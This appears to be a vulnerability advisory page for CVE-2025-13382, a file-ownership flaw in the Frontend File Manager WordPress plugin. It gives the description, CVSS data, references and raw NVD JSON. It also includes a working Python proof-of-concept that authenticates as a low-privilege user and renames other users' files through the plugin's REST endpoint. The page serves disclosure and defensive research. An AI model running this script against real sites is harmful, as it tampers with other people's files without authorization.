Security Vulnerability Report
CVE-2025-13382 (CVSS 4.3 MEDIUM)

Published: 2025-11-25 08:15:50
Last Modified: 2026-04-15 00:35:42

Description

The Frontend File Manager Plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 23.4. This is due to the plugin not validating file ownership before processing file rename requests in the '/wpfm/v1/file-rename' REST API endpoint. This makes it possible for authenticated attackers, with Subscriber-level access and above, to rename files uploaded by other users via the 'fileid' parameter.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Frontend File Manager Plugin for WordPress <= 23.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-13382 PoC - WordPress Frontend File Manager IDOR Vulnerability
# Target: WordPress site with Frontend File Manager Plugin < 23.5
# Authentication: Requires Subscriber-level account or higher

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_account"
PASSWORD = "attacker_password"
TARGET_FILE_ID = 123  # ID of victim file to rename
NEW_FILENAME = "malicious_renamed_file.txt"


def get_auth_token():
    """Obtain WordPress REST API authentication token"""
    login_url = f"{TARGET_URL}/wp-json/jwt-auth/v1/token"
    data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    response = requests.post(login_url, json=data)
    if response.status_code == 200:
        return response.json().get("token")
    return None


def rename_victim_file(token, file_id, new_name):
    """Exploit IDOR vulnerability to rename victim file"""
    api_url = f"{TARGET_URL}/wp-json/wpfm/v1/file-rename"
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    payload = {
        "fileid": file_id,  # IDOR: No ownership validation
        "newfilename": new_name
    }
    response = requests.post(api_url, json=payload, headers=headers)
    return response.status_code, response.json()


def main():
    print("[*] CVE-2025-13382 PoC - Frontend File Manager IDOR")
    print(f"[*] Target: {TARGET_URL}")

    # Step 1: Authenticate
    token = get_auth_token()
    if not token:
        print("[-] Authentication failed")
        return
    print("[+] Authentication successful")

    # Step 2: Exploit IDOR vulnerability
    print(f"[*] Attempting to rename file ID {TARGET_FILE_ID}...")
    status, result = rename_victim_file(token, TARGET_FILE_ID, NEW_FILENAME)

    if status == 200:
        print(f"[+] SUCCESS: File renamed to '{NEW_FILENAME}'")
        print(f"[+] Response: {json.dumps(result, indent=2)}")
    else:
        print(f"[-] Attack failed with status {status}")
        print(f"[-] Response: {json.dumps(result, indent=2)}")


if __name__ == "__main__":
    main()
```

References

https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.4/inc/classes/class.rest.php#L20
https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.4/inc/classes/class.rest.php#L52
https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.5/inc/classes/class.rest.php#L20
https://www.wordfence.com/threat-intel/vulnerabilities/id/aa8d5feb-2ae9-44b8-90b5-9fc67226855a?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13382",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-25T08:15:50.253",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Frontend File Manager Plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 23.4. This is due to the plugin not validating file ownership before processing file rename requests in the '/wpfm/v1/file-rename' REST API endpoint. This makes it possible for authenticated attackers, with Subscriber-level access and above, to rename files uploaded by other users via the 'fileid' parameter."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-639"}]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.4/inc/classes/class.rest.php#L20", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.4/inc/classes/class.rest.php#L52", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.5/inc/classes/class.rest.php#L20", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aa8d5feb-2ae9-44b8-90b5-9fc67226855a?source=cve", "source": "[email protected]"}
    ]
  }
}
```